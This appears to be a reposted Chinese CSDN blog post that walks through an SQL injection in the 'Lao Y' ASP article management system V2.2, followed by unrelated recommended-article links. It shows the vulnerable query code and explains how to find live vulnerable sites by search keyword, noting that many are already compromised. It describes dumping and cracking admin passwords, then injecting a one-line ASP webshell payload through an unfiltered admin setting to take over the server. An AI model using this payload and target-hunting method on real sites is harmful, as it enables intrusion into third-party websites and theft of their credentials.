网络***实战:老Y文章管理系统V2.2注入漏洞分析与利用

最新推荐文章于 2024-02-07 17:10:22 发布
最新推荐文章于 2024-02-07 17:10:22 发布
阅读量378 收藏
点赞数
文章标签: 数据库 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34037515/article/details/85170455
版权
网络***实战:老Y文章管理系统V2.2注入漏洞分析与利用
安天365团队
    同学说让我帮忙架设一个网站,同时要保证整个网站的安全。自己开发,开玩笑,工作量巨大,还是通过网络,在别人的基础上进行修改吧!于是我就去Baidu了下asp文章管理系统来做个自己的文章站(ASP空间便宜嘛),找到了一个laoy8的文章管理系统,由于自己也是学安全的,所以至少也得检查下安全性,总不能三天两头让人修改数据。
(一)前期分析
   由于该套系统是ASP+ACCESS,可能对于我们来说就有很多的限制,不像MSSQL,MYSQL有那么多的扩展和内置函数使用,其实像这些asp,php,jsp的动态网站注入,很大一方面是需要对各种数据库的了解,你了解的越深***的方法就越多,说偏了,还是来看看我们的站,首先进入官方网站看看:[url]www.laoy8.cn[/url],随便点个[url]http://www.laoy8.cn/Class.asp?ID=4[/url],并在后面加了个逗号,提示说参数不合法,被过滤了,本想注册个用户再看看,但想到是ACCESS数据库,就算过滤不严插入一句话到数据库也起不到多大作用,所以还是下载源代码到本机进一步分析。
(二)漏洞分析
   由于代码不是很多,我们就来依次分析下主要的文件,使用正则表达式((select|update|delete|insert)+.*(from|set|into)+.*(where)+.*)来搜索相关的asp文件,由于access不支持多句查询,这里其实完全可以只搜索含有关键词select的asp文件,再xinqing.asp中找到如下代码:
action = Replace(Trim(Request.QueryString("action")),"'","")
id = Replace(Trim(Request.QueryString("id")),"'","")
typee = Replace(Trim(Request.QueryString("typee")),"'","")
if action="show" then
          set rs=server.createobject("adodb.recordset")
          sql="Select * From Yao_XinQing Where cstr(ArticleID)="&id&""
      rs.open sql,conn,1,1
    省略N多
   相信大家都能明白吧,id变量只是单纯的过滤了单引号就带入进了数据库,很明显产生了注入,简单分析下代码的意思,然后来构造自己的 注入语句 URL?action=show&id=317 这里id的变量从Yao_XinQing表中找的一个存在的值,然后放到注入工具就可以得到管理员用户名和密码,当然也可以用我给大家提供的工具,直接爆出管理员信息,然后把密码拿到[url]www.cmd5.com[/url]去破解,接下来的事就简单。
(三)网络实战
   1.  通过关键字搜索老Y文章管理系统V2.2
既然“老Y文章管理系统V2.2”存在漏洞,那么赶紧去网络战场去实战下,由于官方网站已经打了补丁最新版本是V2.3,所以我们找到合适的关键词用“Powered by laoy8 V2.2”,放到Baidu去搜搜,找到相关网页约34,100篇,如图1所示。
attachimg.gif 1.JPG
下载 (36.15 KB)
23 秒前

图1 通过关键字搜索老Y文章管理系统V2.2
2.前期准备工作
由于前面的很多网站已被挂马,大家还是尽量选稍微靠后的网站进行测试,我用自己的空间[url]http://www.ibk528.com/[/url]来尝试,直接用工具爆出用户名和密码登陆后台,可是发现数据库备份被删了,这可怎么办,突然想到由于配置文件(inc/config.asp)是asp,这样不就可以通过配置信息写如一句话***,说着查看了下Admin_Setting.asp,发现除了ad1,ad2,ad3没有过滤,其他的参数由于过滤了双引号,那么我们就利用ad1参数来进行本地提交一句户***到服务器,将后台的页面保存为admin_setting.htm,如图2所示。
attachimg.gif 3.JPG
下载 (35.41 KB)
22 秒前

图2 创造“有利条件”
3.获取Webshell
将提交地址改为[url]http://www.ibk528.com/admin/Admin_Setting.asp?Action=Edit[/url],将ad1的参数设为: "%><% execute request("#")%><%" ;然后点击提交,提示修改成功,然后用客户端连接即可配置文件,利用小马传大马。最后将得到的Webshell截张图,如图3所示。
attachimg.gif 2.JPG
下载 (51.48 KB)
20 秒前

(四)总结体会
   本文没有什么高深的技术,在这里只是想提醒大家在没有数据库备份的情况下,我们可以利用配置信息来插入一句话***,希望对大家平时***网站时有点帮助,上面提到的网站已在第一时间补上,大家不用再去测试了,如果大家发现了其他的漏洞,也请大侠你手下留情,别在我网站上挂马,在此谢谢了。我的网名OVEGN,欢迎大家到安天365论坛(antian365.com)与我交流。
weixin_34037515
关注
AIGC从入门到实战:AI 赋能推荐系统,提升用户黏性和用户体验
程序员光剑
06-29 798
在当今数字化时代,信息过载已成为一个普遍问题。用户每天都面临着海量的内容选择,如何在这个信息爆炸的时代找到真正感兴趣的内容成为一个巨大挑战。推荐系统(Recommender System,RS)应运而生,旨在为用户提供个性化的内容推荐,提高用户体验和满意度。随着人工智能技术的飞速发展,特别是大语言模型(Large Language Model,LLM)的出现,为推荐系统带来了新的机遇和挑战。LLM凭借其强大的自然语言理解和生成能力,为推荐系统的个性化用户行为预测提供了新的可能性。
基于深度学习的入侵检测系统设计与实现
最新发布
程序员光剑
08-06 1246
基于深度学习的入侵检测系统在提高检测精度和效率方面展现出了巨大的潜力,然而,它仍然面临着一些挑战,例如数据标准化、模型解释性、攻击的多样性等。未来,我们需要在这些方面进行更深入的研究,并开发出更强大的入侵检测系统。
y文章管理系统
08-16
y文章管理系统是由y基于Asp+Access/Mssql环境下开发的开源建站产品。在很大程度上满足了初级个人用户及企业、事业单位、团体、机构等的建站需求。不需要网站操作者会复杂的程序
网钛php 漏洞,网钛文章管理系统(OTCMS)2.84 SQL注射漏洞
weixin_30064143的博客
04-04 715
漏洞作者: 语邑尘网钛文章管理系统(OTCMS)2.84 的 rss.asp 存在注入漏洞。可获取管理员及密码。因密码经过两次CMD5加密,危害较小。问题代码:[php]typeStr = Trim(request.querystring("typeStr"))maxNum = Trim(request.querystring("maxNum"))typeWhereStr = ""typeTitl...
y文章管理系统php,Y文章管理系统v3.0 sp1build 20130309
weixin_31600859的博客
03-09 193
y文章管理系统采用Asp+Access开发,适应中小新闻文章型网站及个人网站需求及asp初学者学习用,整个网站采用Div+Css布局,IE6、IE7、Firefox下测试无误。y文章管理系统安装:1.放在根目录,不用任何修改即可正常运行;如果放在虚拟目录,请打开inc/config.asp修改SitePath="/目录名/"2.请确保你的空间支持FSO及AspJpeg组件,否则可能有些功能无法...
y3.0 y文章管理系统
10-07
y y3.0 y文章管理系统 y3.0文章管理系统
y文章管理系统 v4.06
02-13
y文章管理系统是由y基于Asp+Access/Mssql环境下开发的开源建站产品。在很大程度上满足了初级个人用户及企业、事业单位、团体、机构等的建站需求。不需要网站操作者会复杂的程序代码,只需要轻点鼠标就能建设功能齐全的专业级网站!是初级建站首选。会员组、QQ用户登录、投票调查、评论、广告系统等功能,加强网站的互动性的同时也可为网站的发展带来一定的盈利模式。 本程序可使用动态、无组件伪静态、URL_ReWrite伪静态(需空间支持)三种方式浏览。 y文章管理系统 以安全第一为原则,解决了ASP程序的常见漏洞问题。程序自身无任何后门,严格的代码过滤为网站的安全运行提供了可靠的保障。
进阶Shell编程:脚本高级应用与实战
# 1. Shell编程基础回顾 ## 1.1 Shell脚本的基本语法回顾 在本节中,我们将回顾Shell脚本的基本语法。Shell脚本是一种用来自动完成各种任务的编程语言。通过编写Shell脚本,我们可以将复杂的操作用简单的命令组合...
Java算法可视化实战:构建高效可视化项目的5个实战策略
它是计算机科学教育中一个重要的工具,可以帮助学习者更深入地理解算法的工作原理及其效率分析。 ## 1.1 可视化的目的与重要性 可视化算法的主要目的在于提供一个直观的、动态的学习和理解平台。它通过图像
实战:搭建个人网站的安全防护
网站安全面临各种威胁和风险,包括但不限于SQL注入攻击、XSS跨站脚本攻击、CSRF跨站请求伪造攻击、DDoS攻击、数据泄露等问题,这些威胁对网站的安全构成了严重威胁。 ## 1.3 成为网络攻击目标的后果 一旦成为网络...
千锋渗透测试学习专用文章管理系统php-cms网站源代码
07-30
千锋网络安全渗透测试Web架构安全分析章节配套的一个网站源码(cms.zip),用于安全渗透学习,名称为:文章管理系统。使用前需要先配置数据库,导入mysql文件。 这个网站仅用于千锋网络安全学习使用,内容来源网络,如有侵权建议联系上传者。
文章管理系统(CMS)
12-11
文章管理系统是对文章进行一系列的管理操作,主要是文章的发布、编写,还有栏目的管理
渗透测试
02-17
渗透测试
渗透测试文章.zip
04-20
网络安全
渗透学习测试网站源码打包带走
05-24
渗透学习测试网站源码打包带走。asp+access注入源码;cookie注入源码;DVWA漏洞平台测试源码;ewebeditor;fck漏洞源码;fck突破“_”源码;iis6.0解析漏洞源码;phpcms2008;php包含漏洞源码;WEBSHELL箱子系统V2.0;xss漏洞测试源码;搜索注入源码;制作高级webshell后门附带工具。
y文章管理系统php,y文章管理系统纯静态版
weixin_28713083的博客
03-09 482
Y文章系统纯静态版v1.0(依照Y官方v3.0sp1修改)。关于升级:如果没有改动下列文件,则其它文件按照Y官方升级替换。Index.asp 修改显示首页幻灯片纯静态网页连接Js.asp 增加纯静态模式下外部调用Sitemap.asp 修改显示纯静态模式下网站地图Search.asp 增加修改纯静态模式下的网站搜索Admin/Admin_Class.asp 增加分类静态化功能和删除时也删除静...
Y文章管理系统函数列表
网络Online
07-31 972
Function Mydb(MySqlstr,MyDBType) Select Case MyDBType Case 0 : Conn.Execute(MySqlstr) : Dataquery = Dataquery + 1 Case 1 : Set Mydb = Conn.Execute(MySqlstr) : Dataquery = Dataquery + 1 Case 2 : Set My
Y文章管理系统:写作神器的5大利器
nFUnEP4X的博客
02-07 340
这款Y文章管理系统采集软件极具吸引力,在本人亲身试用后,特向您详细说明各项功能与优势。1.简单易用,上手无压力在接触Y文章管理系统前,我曾认为写作犹如攀登高峰。然而,初次试用此款神器后,简洁明了的操作界面及合理有序的功能布局令我惊叹不已。经过轻点几下和简单设置,即可探究心仪之作。2
Y文章管理系统改Ms sql版的方法(SQL版Y文章管理系统
gentle_sword的专栏
06-23 641
<br />本计划用三天时间改完,结果很意外只用了一个上午的时间。<br />如果需要帮助,请联系我:
Springboot实战:全方位权限管理系统源码与关键技术
本教程深入讲解了Spring Boot框架在角色权限后台管理系统中的实战开发过程,提供了一个完整的源码示例。系统功能包括用户管理、角色管理、权限管理、日志管理以及数据库备份等实用特性。开发者将学习到以下关键知识...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值